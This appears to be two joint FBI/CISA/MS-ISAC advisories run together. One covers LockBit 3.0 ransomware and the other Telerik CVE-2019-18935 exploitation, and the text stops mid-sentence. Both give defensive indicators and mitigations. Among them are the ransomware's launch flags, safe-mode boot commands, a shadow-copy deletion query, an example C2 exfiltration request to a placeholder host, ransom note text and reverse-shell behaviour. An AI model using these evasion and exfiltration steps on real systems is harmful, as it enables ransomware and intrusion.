Note: this joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
Actions to take today to mitigate cyber threats from ransomware:
The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing & Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known LockBit 3.0 ransomware IOCs and TTPs identified through FBI investigations as recently as March 2023.
The LockBit 3.0 ransomware operations function as a Ransomware-as-a-Service (RaaS) model and is a continuation of previous versions of the ransomware, LockBit 2.0, and LockBit. Since January 2020, LockBit has functioned as an affiliate-based ransomware variant; affiliates deploying the LockBit RaaS use many varying TTPs and attack a wide range of businesses and critical infrastructure organizations, which can make effective computer network defense and mitigation challenging.
The FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK for Enterprise.
CAPABILITIES
LockBit 3.0, also known as “LockBit Black,” is more modular and evasive than its previous versions and shares similarities with Blackmatter and Blackcat ransomware.
LockBit 3.0 is configured upon compilation with many different options that determine the behavior of the ransomware. Upon the actual execution of the ransomware within a victim environment, various arguments can be supplied to further modify the behavior of the ransomware. For example, LockBit 3.0 accepts additional arguments for specific operations in lateral movement and rebooting into Safe Mode (see LockBit Command Line parameters under Indicators of Compromise). If a LockBit affiliate does not have access to passwordless LockBit 3.0 ransomware, then a password argument is mandatory during the execution of the ransomware. LockBit 3.0 affiliates failing to enter the correct password will be unable to execute the ransomware [T1480.001]. The password is a cryptographic key which decodes the LockBit 3.0 executable. By protecting the code in such a manner, LockBit 3.0 hinders malware detection and analysis with the code being unexecutable and unreadable in its encrypted form. Signature-based detections may fail to detect the LockBit 3.0 executable as the executable’s encrypted potion will vary based on the cryptographic key used for encryption while also generating a unique hash. When provided the correct password, LockBit 3.0 will decrypt the main component, continue to decrypt or decompress its code, and execute the ransomware.
LockBit 3.0 will only infect machines that do not have language settings matching a defined exclusion list. However, whether a system language is checked at runtime is determined by a configuration flag originally set at compilation time. Languages on the exclusion list include, but are not limited to, Romanian (Moldova), Arabic (Syria), and Tatar (Russia). If a language from the exclusion list is detected [T1614.001], LockBit 3.0 will stop execution without infecting the system.
INITIAL ACCESS
Affiliates deploying LockBit 3.0 ransomware gain initial access to victim networks via remote desktop protocol (RDP) exploitation [T1133], drive-by compromise [T1189], phishing campaigns [T1566], abuse of valid accounts [T1078], and exploitation of public-facing applications [T1190].
EXECUTION AND INFECTION PROCESS
During the malware routine, if privileges are not sufficient, LockBit 3.0 attempts to escalate to the required privileges [TA0004]. LockBit 3.0 performs functions such as:
Enumerating system information such as hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices [T1082]
Enabling automatic logon for persistence and privilege escalation [T1547]
Deleting log files, files in the recycle bin folder, and shadow copies residing on disk [T1485], [T1490]
LockBit 3.0 attempts to spread across a victim network by using a preconfigured list of credentials hardcoded at compilation time or a compromised local account with elevated privileges [T1078]. When compiled, LockBit 3.0 may also enable options for spreading via Group Policy Objects and PsExec using the Server Message Block (SMB) protocol. LockBit 3.0 attempts to encrypt [T1486] data saved to any local or remote device, but skips files associated with core system functions.
After files are encrypted, LockBit 3.0 drops a ransom note with the new filename <Ransomware ID>.README.txt and changes the host’s wallpaper and icons to LockBit 3.0 branding [T1491.001]. If needed, LockBit 3.0 will send encrypted host and bot information to a command and control (C2) server [T1027].
Once completed, LockBit 3.0 may delete itself from the disk [T1070.004] as well as any Group Policy updates that were made, depending on which options were set at compilation time.
EXFILTRATION
LockBit 3.0 affiliates use Stealbit, a custom exfiltration tool used previously with LockBit 2.0 [TA0010]; rclone, an open-source command line cloud storage manager [T1567.002]; and publicly available file sharing services, such as MEGA [T1567.002], to exfiltrate sensitive company data files prior to encryption. While rclone and many publicly available file sharing services are primarily used for legitimate purposes, they can also be used by threat actors to aid in system compromise, network exploration, or data exfiltration. LockBit 3.0 affiliates often use other publicly available file sharing services to exfiltrate data as well [T1567] (see Table 1).
Table 1: Anonymous File Sharing Sites Used to Exfiltrate Data Before System Encryption
File Sharing Site
https://www.premiumize[.]com
https://anonfiles[.]com
https://www.sendspace[.]com
https://fex[.]net
https://transfer[.]sh
https://send.exploit[.]in
LEVERAGING FREEWARE AND OPEN-SOURCE TOOLS
LockBit affiliates have been observed using various freeware and open-source tools during their intrusions. These tools are used for a range of activities such as network reconnaissance, remote access and tunneling, credential dumping, and file exfiltration. Use of PowerShell and Batch scripts
are observed across most intrusions, which focus on system discovery, reconnaissance, password/credential hunting, and privilege escalation. Artifacts of professional penetration-testing tools such as Metasploit and Cobalt Strike have also been observed. See Table 2 for a list of legitimate freeware and open-source tools LockBit affiliates have repurposed for ransomware operations:
Table 2: Freeware and Open-Source Tools Used by LockBit 3.0 Affiliates
The IOCs and malware characteristics outlined below were derived from field analysis. The following samples are current as of March 2023.
LockBit 3.0 Black Icon
LockBit 3.0 Wallpaper
LockBit Command Line Parameters
LockBit Parameters
Description
-del
Self-delete.
-gdel
Remove LockBit 3.0 group policy changes.
-gspd
Spread laterally via group policy.
-pass (32 character value)
(Required) Password used to launch LockBit 3.0.
-path (File or path)
Only encrypts provided file or folder.
-psex
Spread laterally via admin shares.
-safe
Reboot host into Safe Mode.
-wall
Sets LockBit 3.0 Wallpaper and prints out LockBit 3.0 ransom note.
Mutual Exclusion Object (Mutex) Created
When executed, LockBit 3.0 will create the mutex, Global<MD4 hash of machine GUID>,
and check to see if this mutex has already been created to avoid running more than one instance of the ransomware.
UAC Bypass via Elevated COM Interface
LockBit 3.0 is capable of bypassing User Account Control (UAC) to execute code with elevated privileges via elevated Component Object Model (COM) Interface. C:WindowsSystem32dllhost.exe is spawned with high integrity with the command line GUID 3E5FC7F9-9A51-4367-9063-A120244FBEC.
For example, %SYSTEM32%dllhost.exe/Processid:{3E5FC7F9-9A51-4367-9063- A120244FBEC7}.
Volume Shadow Copy Deletion
LockBit 3.0 uses Windows Management Instrumentation (WMI) to identify and delete Volume Shadow Copies. LockBit 3.0 uses select * from Win32_ShadowCopy to query for Volume Shadow copies, Win32_ShadowCopy.ID to obtain the ID of the shadow copy, and DeleteInstance to delete any shadow copies.
LockBit 3.0 has a Safe Mode feature to circumvent endpoint antivirus and detection. Depending upon the host operating system, the following command is launched to reboot the system to Safe Mode with Networking:
Operating System
Safe Mode with Networking command
Vista and newer
bcdedit /set {current} safeboot network
Pre-Vista
bootcfg /raw /a /safeboot:network /id 1
Operating System
Disable Safe mode reboot
Vista and newer
bcdedit /deletevalue {current} safeboot
Pre-Vista
bootcfg /raw /fastdetect /id 1
Group Policy Artifacts
The following are Group Policy Extensible Markup Language (XML) files identified after a LockBit 3.0 infection:
Once new group policies are added, a PowerShell command using Group Policy update (GPUpdate) applies the new group policy changes to all computers on the AD domain.
~~~ LockBit 3.0 the world’s fastest and most stable ransomware from 2019~~~
>>>>> Your data is stolen and encrypted.
If you don’t pay the ransom, the data will be published on our TOR darknet sites. Keep in mind that once your data appears on our leak site, it could be bought by your competitors at any second, so don’t hesitate for a long time. The sooner you pay the ransom, the sooner your company will be safe.
Network Connections
If configured, Lockbit 3.0 will send two HTTP POST requests to one of the C2servers. Information about the victim host and bot are encrypted with an Advanced Encryption Standard (AES) key and encoded in Base64.
Example of HTTP POST request
POST <Lockbit C2>/?7F6Da=u5a0TdP0&Aojq=&NtN1W=OuoaovMvrVJSmPNaA5&fckp9=FCYyT6b7kdyeEXywS8I8 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br Content-Type: text/plain
User-Agent: Safari/537.36 <Lockbit User Agent String>
Host: <Lockbit C2>
Connection: Keep-Alive LIWy=RJ51lB5GM&a4OuN=<Lockbit
ID>&LoSyE3=8SZ1hdlhzld4&DHnd99T=rTx9xGlInO6X0zWW&2D6=Bokz&T1guL=MtRZsFCRMKyBmfmqI& 6SF3g=JPDt9lfJIQ&wQadZP=<Base64 encrypted data> Xni=AboZOXwUw&2rQnM4=94L&0b=ZfKv7c&NO1d=M2kJlyus&AgbDTb=xwSpba&8sr=EndL4n0HVZjxPR& m4ZhTTH=sBVnPY&xZDiygN=cU1pAwKEztU&=5q55aFIAfTVQWTEm&4sXwVWcyhy=l68FrIdBESIvfCkvYl
Example of information found in encrypted data
{ "bot_version":"X", "bot_id":"X", "bot_company":"X", "host_hostname":"X", "host_user":"X", "host_os":"X", "host_domain":"X", "host_arch":"X", "host_lang":"X", "disks_info":[
{ "disk_name":"X", "disk_size":"XXXX", "free_size":"XXXXX"
}
LockBit 3.0 will enumerate system information to include hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices.
System Location Discovery: System Language Discovery
LockBit 3.0 actors use (1) rclone, an open source command line cloud storage manager to exfiltrate and (2) MEGA, a publicly available file sharing service for data exfiltration.
LockBit 3.0 changes the host system’s wallpaper and icons to the LockBit 3.0 wallpaper and icons, respectively.
MITIGATIONS
The FBI, CISA, and the MS-ISAC recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of LockBit 3.0’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud).
Refrain from requiring password changes more frequently than once per year. Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
Require administrator credentials to install software
Require phishing-resistant multifactor authentication [CPG 1.3] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.
Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.
Segment networks [CPG 8.1] to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement.
Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network [CPG 5.1]. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.
Install, regularly update, and enable real time detection for antivirus software on all hosts.
Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.
Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 1.5].
Disable unused ports.
Consider adding an email banner to emails [CPG 8.3] received from outside your organization.
Disable hyperlinks in received emails.
Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.
Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.
Maintain offline backups of data, and regularly maintain backup and restoration [CPG 7.3]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.
Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 3.3].
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, the FBI, CISA, and the MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI, CISA, and the MS-ISAC authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
Select an ATT&CK technique described in this advisory (see Table 3).
Align your security technologies against the technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.
The FBI, CISA, and the MS-ISAC recommend continually testing your security program at scale and in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
RESOURCES
Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
The FBI is seeking any information that can be legally shared, including:
Boundary logs showing communication to and from foreign IP addresses
Sample ransom note
Communications with LockBit 3.0 actors
Bitcoin wallet information
Decryptor files
Benign sample of an encrypted file
The FBI, CISA, and MS-ISAC do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office or CISA at report@cisa.gov. State, local, tribal, and territorial (SLTT) government entities can also report to the MS-ISAC (SOC@cisecurity.org or 866-787-4722).
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, and the MS-ISAC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, or the MS-ISAC.
From November 2022 through early January 2023, the Cybersecurity and Infrastructure Security Agency (CISA) and authoring organizations identified the presence of indicators of compromise (IOCs) at a federal civilian executive branch (FCEB) agency. Analysts determined that multiple cyber threat actors, including an APT actor, were able to exploit a .NET deserialization vulnerability (CVE-2019-18935) in Progress Telerik user interface (UI) for ASP.NET AJAX, located in the agency’s Microsoft Internet Information Services (IIS) web server. Successful exploitation of this vulnerability allows for remote code execution. According to Progress Software, Telerik UI for ASP.NET AJAX builds before R1 2020 (2020.1.114) are vulnerable to this exploit.[1]
Actions to take today to mitigate malicious cyber activity:
Implement a patch management solution to ensure compliance with the latest security patches.
Validate output from patch management and vulnerability scanning against running services to check for discrepancies and account for all services.
Limit service accounts to the minimum permissions necessary to run services.
CISA, the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) to provide IT infrastructure defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation.
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding detection and mitigation recommendations.
Overview
CISA and authoring organizations assess that, beginning as late as November 2022, threat actors successfully exploited a .NET deserialization vulnerability (CVE-2019-18935) in an instance of Telerik UI for ASP.NET AJAX Q2 2013 SP1 (version 2013.2.717) running on an FCEB agency’s Microsoft IIS server. This exploit, which results in interactive access with the web server, enabled the threat actors to successfully execute remote code on the vulnerable web server. Though the agency’s vulnerability scanner had the appropriate plugin for CVE-2019-18935, it failed to detect the vulnerability due to the Telerik UI software being installed in a file path it does not typically scan. This may be the case for many software installations, as file paths widely vary depending on the organization and installation method.
In addition to CVE-2019-18935, this version (2013.2.717) of Telerik UI for ASP.NET AJAX contains the following known vulnerabilities: CVE-2017-11357, CVE-2017-11317, and CVE-2017-9248. Analysis suggests that cyber threat actors exploited CVE-2019-18935 in conjunction with either CVE-2017-11357 or CVE-2017-11317. Australian Cyber Security Centre (ACSC) Advisory 2020-004 assesses that exploitation of CVE-2019-18935 is only possible with knowledge of Telerik RadAsyncUpload encryption keys.[2] Threat actors can obtain these keys through either prior knowledge or exploitation of vulnerabilities—CVE-2017-11357 or CVE-2017-11317—present in older, unpatched versions of Telerik released between 2007 and 2017. Forensic evidence is not available to definitively confirm exploitation of either CVE-2017-11357 or CVE-2017-11317.
Threat Actor Activity
CISA and authoring organizations observed multiple cyber threat actors, including an APT actor—hereafter referred to as Threat Actor 1 (TA1)—and known cybercriminal actor XE Group—hereafter referred to as Threat Actor 2 (TA2)—conducting reconnaissance and scanning activities [T1595.002] that correlate to the successful exploitation of CVE-2019-18935 in the agency’s IIS server running Telerik UI for ASP.NET AJAX [T1190].
When exploiting the vulnerability, the threat actors uploaded malicious dynamic-link library (DLL) files (some masqueraded as portable network graphics [PNG] files) [T1105] to the C:WindowsTemp directory. The malicious files were then executed from the C:WindowsTemp directory via the w3wp.exe process—a legitimate process that runs on IIS servers. This process is routine for handling requests sent to web servers and delivering content. The review of antivirus logs identified that some DLL files were created [T1055.001] and detected as early as August 2021.
CISA and authoring organizations confirmed that some malicious files dropped on the IIS server are consistent with a previously reported file naming convention that threat actors commonly use when exploiting CVE-2019-18935.[3] The threat actors name the files in the Unix Epoch time format and use the date and time as recorded on the target system. The file naming convention follows the pattern [10 digits].[7 digits].dll (e.g., a file created on October 31, 2022, could be 1667203023.5321205.dll).
The names of some of the PNG files were misleading. For example, file 1596835329.5015914.png, which decodes to August 7, 2020, 21:22:09 UTC, first appeared on October 13, 2022, but the file system shows a creation date of August 7, 2020. The uncorrelated Unix Epoch time format may indicate that the threat actors used the timestomping [T1070.006] technique. This file naming convention is a primary IOC used by the threat actors.
In many cases, malicious artifacts were not available for analysis because the threat actors’ malware—that looks for and removes files with the .dll file extension—removed files [T1070.004] from the C:WindowsTemp directory. Through full packet data capture analysis and reverse engineering of malicious DLL files, no indications of additional malicious activity or sub-processes were found executed by the w3wp.exe process. CISA observed error messages being sent to the threat actors’ command and control (C2) server when permission restraints prevented the service account from executing the malicious DLLs and writing new files.
Network activity analysis was consistent with the artifacts provided for review. Analysts did not observe evidence of privilege escalation or lateral movement.
Threat Actor 1
CISA and authoring organizations observed TA1 exploiting CVE-2019-18935 for system enumeration beginning in August 2022. The vulnerability allows a threat actor to upload malicious DLLs on a target system and execute them by abusing a legitimate process, e.g., the w3wp.exe process. In this instance, TA1 was able to upload malicious DLL files to the C:WindowsTemp directory and then achieve remote code execution, executing the DLL files via the w3wp.exe process.
At least nine DLL files used for discovery [TA0007], C2 [TA0011], and defense evasion [TA0005]. All of the analyzed samples have network parameters, including host name, domain name, Domain Name System (DNS) server Internet Protocol (IP) address and machine name, Network Basic Input/Output System (NetBIOS) ID, adapter information, IP address, subnet, gateway IP, and Dynamic Host Configuration Protocol (DHCP) server [T1016]. All analyzed samples communicate this collected data to a C2 server at IP address 137.184.130[.]162 or 45.77.212[.]12. The C2 traffic to these IP addresses uses a non-application layer protocol [T1095] by leveraging Transmission Control Protocol (TCP) clear text (i.e., unencrypted) over port 443. Analysis also identified that:
Some of the analyzed samples can load additional libraries; enumerate the system, processes, files, directories [T1083]; and write files.
Other analyzed samples can delete DLL files ending with the .dll extension in the C:WindowsTemp directory on the server. TA1 may use this capability to hide additional malicious activity on the network.
CISA, in coordination with the authoring organizations, identified and observed the following threat actor IPs and timestamps associated with this activity:
Table 1: Observed TA1 IPs and Timestamps
IP Address
First Identified
Last Identified
137.184.130[.]162
09/26/2022
10/08/2022
45.77.212[.]12
10/07/2022
11/25/2022
104.225.129[.]102
10/10/2022
11/16/2022
149.28.85[.]24
10/12/2022
10/17/2022
185.186.245[.]72
10/18/2022
10/18/2022
193.8.172[.]113
09/25/2022
09/25/2022
193.8.172[.]13
09/25/2022
10/17/2022
216.120.201[.]12
10/13/2022
11/10/2022
5.34.178[.]246
09/25/2022
09/25/2022
79.133.124[.]242
09/25/2022
09/25/2022
92.38.169[.]193
09/27/2022
10/08/2022
92.38.176[.]109
09/12/2022
09/25/2022
92.38.176[.]130
09/25/2022
10/07/2022
Threat Actor 2
TA2—identified as likely the cybercriminal actor XE Group—often includes xe[word] nomenclature in original filenames and registered domains. Volexity lists this naming convention and other observed TTPs as common for this threat actor group.[4]
As early as August 2021, CISA and authoring organizations observed TA2 delivering malicious PNG files that, following analysis, were masqueraded DLL files to avoid detection [T1036.005]. Similar to TA1, TA2 exploited CVE-2019-18935 and was able to upload at least three unique DLL files into the C:WindowsTemp directory that TA2 executed via the w3wp.exe process. These DLL files drop and execute reverse (remote) shell utilities for unencrypted communication with C2 IP addresses associated with the malicious domains listed in Table 2. Note: At the time of analysis, the domains resolved to the listed IP addresses.
Table 2: TA2 IPs and Resolving Domains
IP Address
Resolving Domains
184.168.104[.]171
xework[.]com
xegroups[.]com
hivnd[.]com
144.96.103[.]245
xework[.]com
Analysis of DLL files determined the files listed in Table 3 were dropped, decoded, and attempted to connect to the respective malicious domains. Embedded payloads dropped by the DLL files were observed using the command line utility certutil[.]exe and writing new files as xesvrs[.]exe to invoke reverse shell utilities execution.
Table 3: Identified Malicious Files
Filename
Description
XEReverseShell.exe
DLL files (masqueraded as PNG files) located in the C:WindowsTemp directory contain a base64 encoded file with the internal name XEReverseShell.exe, which was dropped into the same directory as sortcombat.exe.
When executed, the reverse shell utility attempts to connect to xework[.]com or xegroups[.]com to obtain the IP address of the C2 server and port number for unencrypted communication.
Note: It is likely the threat actors changed the file extension from .dll to .png to avoid detection.
Multi-OS_ReverseShell.exe
Reverse shell utility decoded from the base64 encoded file xesmartshell.tmp.
When executed, it will attempt to connect to xegroups[.]com or xework[.]com to obtain the IP address of the C2 server and port number for unencrypted communication.
SortVistaCompat
Base64 encoded payload dropped from Multi-OS_ReverseShell.exe. This file receives the C2 IP and port from xework[.]com.
When the TA2 malware is executed a DLL file drops an executable (XEReverseShell.exe) that attempts to pull a C2 IP address and port number from xework[.]com or xegroups[.]com.
If no port or IP address is found, the program will exit.
If a port and IP address are found, the program will establish a listener and wait for further commands.
If communication is established between the TA2 malware and the C2:
The malware will identify the operating system (Windows or Linux) and create the appropriate shell (cmd or bash), sending system information back to the C2.
The C2 server may send the command xesetshell, causing the malware to connect to the server and download a file called small.txt—a base64-encoded webshell that the malware decodes and places in the C:WindowsTemp directory.
The C2 server may send the command xequit, causing the malware to sleep for a period of time determined by the threat actors.
The two files xesmartshell.tmp and SortVistaCompat have the capability to drop an Active Server Pages (ASPX) webshell—a base64 encoded text file small.txt decoded [T1140] as small.aspx [T1505.003]—to enumerate drives; to send, receive, and delete files; and to execute incoming commands. The webshell contains an interface for easily browsing files, directories, or drives on the system, and allows the user to upload or download files to any directory. No webshells were observed to be dropped on the target system, likely due to the abused service account having restrictive write permissions.
Actors used a non-application layer protocol (TCP) for w3wp.exe process exploitation, C2, and enumeration on the IIS server.
DETECTION METHODS
CISA and authoring organizations recommend that organizations review the steps listed in this section and Table 4: Identified ATT&CK Techniques for Enterprise to detect similar activity on IIS servers.
Yara Rule
CISA developed the following YARA rule from the base proof-of-concept code for CVE-2019-18935.[5] Note: Authoring organizations do not guarantee all malicious DLL files (if identified) will use the same code provided in this YARA rule.
CISA, FBI, and MS-ISAC recommend that organizations utilize a centralized log collection and monitoring capability, as well as implement or increase logging and forensic data retention. Longer retention policies improve the availability of data for forensic analysis and aid thorough identification of incident scope.
Centralized log collection and monitoring allows for the discovery of webshell and other exploit activity. For example, organizations should monitor for external connections made from the IIS server to unknown external IP addresses. Logging may also be available—if enabled at the router or firewall—for any outbound connections initiated with PowerShell.
Access- and security-focused firewall (e.g., Web Application Firewall [WAF]) logs can be collected and stored for use in both detection and forensic analysis activities. Organizations should use a WAF to guard against publicly known web application vulnerabilities, in addition to guarding against common web application attacks.
Creation of Malicious DLLs
CISA, FBI, and MS-ISAC recommend that organizations use process monitoring—which provides visibility into file system and application process activity—to detect suspicious executable files running from the C:WindowsTemp directory. Process monitoring via Windows Event Code 4688 will detect the legitimate w3wp.exe process running suspicious DLL files and other anomalous child processes. Note: Enabling this event may inundate security event logging. Use centralized log collection to prevent log rollover, increase log retention and archiving, and/or enable command line event logging.
Forensic analysis commonly identified the threat actors taking the following steps:
Create one of the DLL files (C:WindowsTemp1665890187.8690152.dll) by process w3wp.exe PID 6484.
Load the newly created DLL into a currently running IIS process, w3wp.exe PID 6484.
Make a TCP connection using w3wp.exe PID 6484 to 45.77.212[.]12 over port 443.
Invoke C:WindowsSystem32vcruntime140.dll (Windows C runtime library) to execute payload.
Steps 1 and 2 occur every time a malicious DLL file is created. In some cases, an ASP .NET temp file was created, but this may have indicated benign IIS server activity. Note: The Process ID (PID) used in this example is unique to this investigation and is not universal. IP address 45.77.212[.]12 correlates to TA1, but the pattern can be used as general practice to identify similar activity.
Additional Searching for IIS Servers
The following information was derived from artifact analysis and is provided to equip IT infrastructure defenders searching for similar activity on an IIS server. Several artifacts can be referenced to assist in determining if CVE-2019-18935 has been successfully exploited.
File Type: DLL
Location: – %SystemDrive%WindowsTemp
When this CVE is exploited, it uploads malicious DLL files to the C:WindowsTemp directory. The malicious DLL file naming convention translates to the exact time the file was uploaded to the server.
The time is represented in a series of digits, known as Unix Epoch time. The files observed during this investigation contained two sets of digits separated by a period (.) before the DLL extension (.dll). Example: 1667206973.2270932.dll
Nearly all recovered files contain a series of 10 digits to the left of the period (.) and seven digits to the right. However, one file contained only five digits in the second set, which should be taken into consideration when writing regex patterns to search for the existence of these files. Example Regex: d{10}.d{1,8}.dll
These numbers can be copied and translated from digits into readable language with the month, day, year, hour, minute, and seconds displayed.
Log Type: IIS
Location: – %SystemDrive%inetpublogsLogFiles
When investigating IIS logs, specific fields were searched for and captured during the time of each connection.
If the Unix Epoch time signature has been translated from a DLL filename, specific logs can be searched based on that time. However, if the Unix Epoch time signature has not been translated, the following will still work, but may take longer for the query to run.
The four most important fields to identify this traffic are noted in the following table. These descriptions are sourced directly from Microsoft.[6]
Table 5: Four Fields Searched in IIS Logs
General Name
Field Name
Description
Method
cs-method
Requested action; for example, a GET method
URI Stem
cs-uri-stem
Universal Resource Identifier (URI), or target, of the action
URI Query
cs-uri-query
The query, if any, that the client was trying to perform; A URI query is necessary only for dynamic pages.
Protocol Status
sc-status
Hypertext Transfer Protocol (HTTP) or File Transfer Protocol (FTP) status code
Note: Depending on how logs are collected and stored, the field names may not be an exact match; this should be taken into consideration when constructing queries.
When ingesting logs into security information and event management (SIEM), the final field names did not use a hyphen (-) but used an underscore (_).
Example: cs_method instead of cs-method
Artifacts:
Table 6: Information Contained in Two Observed IIS Events
Field Name
Artifact
cs-method
POST
>cs-uri-stem
/Telerik.Web.UI.WebResource.axd
cs-uri-query
type=rau
sc-status
200 and 302
When reviewing logs, two IIS events were observed with the same timestamp each time this CVE-2019-18935 was exploited. Both events contained the same information in the cs-method, cs-uri-stem, and cs-uri-query. One event had a sc-status of 200 and the other had a sc-status of 302.
Kroll Artifact Parser and Extractor (KAPE), a forensic artifact collector and parser, was used to extract the Windows event logs from a backup image of the compromised IIS server. All field names refer to the labels provided via KAPE exports. The strings are of value and can be used to locate other artifacts if different tools are used. Note: The payload data in the following table has been shortened to only necessary strings to obscure and protect victim information.
Table 7: Example Payload Data
EventID
Payload
1309
3005, An unhandled exception has occurred[*redacted*]w3wp.exe[*redacted*]InvalidCastException, Unable to cast object of type ‘System.Configuration.Install.AssemblyInstaller’ to type ‘Telerik.Web.UI.IAsyncUploadConfiguration’.n at Telerik.Web.UI.AsyncUploadHandler.GetConfiguration(String rawData)n at Telerik.Web.UI.AsyncUploadHandler.EnsureSetup()n at Telerik.Web.UI.AsyncUploadHandler.ProcessRequest(HttpContext context)n at Telerik.Web.UI.HandlerRouter.ProcessHandler(String handlerKey, HttpContext context)n at Telerik.Web.UI.WebResource.ProcessRequest(HttpContext context)n at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()n at System.Web.HttpApplication.ExecuteStepImpl(IExecutionStep step)n at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)nn, [*redacted*]/Telerik.Web.UI.WebResource.axd?type=rau, /Telerik.Web.UI.WebResource.axd, [*redacted*], False, [*redacted*], 15, [*redacted*], False, at Telerik.Web.UI.AsyncUploadHandler.GetConfiguration(String rawData)n at Telerik.Web.UI.AsyncUploadHandler.EnsureSetup()n at Telerik.Web.UI.AsyncUploadHandler.ProcessRequest(HttpContext context)n at Telerik.Web.UI.HandlerRouter.ProcessHandler(String handlerKey, HttpContext context)n at Telerik.Web.UI.WebResource.ProcessRequest(HttpContext context)n at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()n at System.Web.HttpApplication.ExecuteStepImpl(IExecutionStep step)n at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)n”,”Binary”:””}}
Authoring organizations recommend looking for the following key strings in the payload:
w3wp.exe: This is the parent process that executes the code inside the malicious DLLs.
System.Configuration.Install.AssemblyInstaller: Figure 1 is from the creator’s GitHub repo,[7] where the string can be observed in the code. As presented by Bishop Fox and proven during authoring organizations’ investigation of IIS server logs, an exception does not mean that the exploit failed, but more likely that it executed successfully.[3]
Figure 1: Threat Actor Assembly Installer
If a Werfault crash report was written, Windows event application logs may contain evidence of this— even if the DLLs have been removed from the system as part of a cleanup effort by the threat actors.
The EventID field maps to Windows EventIDs for an easy filter. Users can leverage the Windows EventIDs to find malicious DLL with the Unix Epoch time-based name inside the C:WindowsTemp directory.
Depending how log analysis is performed, various filters can be determined. However, if regex is available, the example listed in Table 8 above can be reused to match the Unix Epoch timestamp convention to assist in filtering.
Additional Analysis
When evidence of malicious DLLs is found, reverse engineering will need to be conducted to fully understand what actions occur as the malicious files could do nearly anything. Leveraging Windows security event logs, as well as Windows PowerShell logs, may provide insight into what actions the DLLs are taking. CISA and authoring organizations recommend the following process:
